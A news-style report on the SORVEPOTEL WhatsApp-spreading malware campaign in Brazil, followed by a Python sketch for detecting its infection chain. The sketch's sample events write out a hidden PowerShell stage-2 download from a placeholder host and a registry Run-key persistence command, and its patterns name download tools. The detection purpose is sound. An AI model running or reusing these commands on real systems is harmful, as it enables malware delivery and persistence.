
New self-replicating WhatsApp malware called SORVEPOTEL

Brazilian users have become the primary target of a new self-propagating malware campaign, codenamed SORVEPOTEL by Trend Micro. The malware abuses the trust users place in the popular messaging app WhatsApp to extend its reach across Windows systems. Researchers, including Jeffrey Francis Bonaobra, Maristel Policarpio, Sophia Nilette Robles, Cj Arsley Mateo, Jacob Santos, and Paul John Bardon, noted that the attack is “engineered for speed and propagation” rather than for data theft or ransomware. The malware spreads through convincing phishing messages carrying malicious ZIP file attachments, which must be opened on a desktop to take effect. This suggests that the threat actors are more focused on targeting enterprises than individual consumers.

Once the attachment is opened, the malware automatically propagates via the desktop web version of WhatsApp, leading to account bans due to excessive spam. The majority of infections, 457 out of 477 cases, are concentrated in Brazil, affecting various sectors, including government, public service, manufacturing, technology, education, and construction. The attack begins with a phishing message from a compromised contact, lending credibility to the malicious ZIP attachment, which masquerades as a harmless file. Evidence also indicates that the operators have used emails from seemingly legitimate addresses to distribute the ZIP files. If the recipient opens the attachment, they inadvertently execute a PowerShell script that retrieves the main payload from an external server. This payload establishes persistence on the host and spreads the malware to all contacts and groups on WhatsApp, resulting in a high volume of spam messages and frequent account suspensions.
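The chain described above (ZIP opened from Explorer, PowerShell fetching a second stage, persistence, then WhatsApp Web used for spreading) can be hunted for in endpoint process-creation telemetry. The following Python is an added detection sketch, not code from Trend Micro or the report; the events, paths, host names and registry value are constructed placeholders, and the `Temp1_<archive>.zip` folder is the location Windows Explorer uses when a file is opened directly from inside a ZIP.

```python
import re

# Constructed Sysmon-style process-creation events (pid, parent pid, image, command line);
# paths, hosts and file names are illustrative placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",  # launched by double-click inside the ZIP
     "cmd": r"powershell.exe -w hidden -ep bypass -File C:\Users\u\AppData\Local\Temp\Temp1_RECEIPT.zip\run.ps1"},
    {"pid": 201, "ppid": 200, "image": "powershell.exe",
     "cmd": "powershell.exe -c \"iwr https://placeholder.invalid/stage2 -OutFile $env:TEMP\\s2.exe\""},
    {"pid": 202, "ppid": 200, "image": "reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\Users\u\AppData\Local\Temp\s2.exe"},
    {"pid": 203, "ppid": 200, "image": "chrome.exe", "cmd": "chrome.exe --app=https://web.whatsapp.com"},
    {"pid": 300, "ppid": 100, "image": "powershell.exe",  # benign: admin script, no archive path, no download
     "cmd": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
# Explorer extracts a file opened straight from a ZIP into %TEMP%\Temp1_<archive>.zip\ first.
ARCHIVE_TEMP = re.compile(r"\\Temp\\Temp1_[^\\]+\.zip\\", re.I)
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl)\b", re.I)
PERSIST = re.compile(r"\\CurrentVersion\\Run\b|schtasks\s+/create|\\Startup\\", re.I)
WHATSAPP_WEB = re.compile(r"web\.whatsapp\.com", re.I)

def descendants(events, root_pid):
    """Yield every event in the process subtree below root_pid (root itself excluded)."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e)
    stack = list(by_parent.get(root_pid, []))
    while stack:
        e = stack.pop()
        yield e
        stack.extend(by_parent.get(e["pid"], []))

def score_chain(events):
    """Flag PowerShell started by Explorer from a ZIP temp folder whose subtree also downloads,
    persists or opens WhatsApp Web. Returns {pid: [reasons]} for chains with corroboration."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (e["image"].lower() != "powershell.exe" or parent is None
                or parent["image"].lower() != "explorer.exe" or not ARCHIVE_TEMP.search(e["cmd"])):
            continue
        reasons = ["powershell launched by explorer from a ZIP temp folder"]
        joined = " ".join(x["cmd"] for x in [e, *descendants(events, e["pid"])])
        for label, pattern in (("stage-2 download", DOWNLOAD), ("persistence write", PERSIST),
                               ("whatsapp web opened", WHATSAPP_WEB)):
            if pattern.search(joined):
                reasons.append(label)
        if len(reasons) >= 3:  # require corroborating behaviour, not just the launch
            findings[e["pid"]] = reasons
    return findings
```

Only the chain under pid 200 is reported; the admin script under pid 300 shares the Explorer parent but has no archive path and no follow-on behaviour, so it stays quiet.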
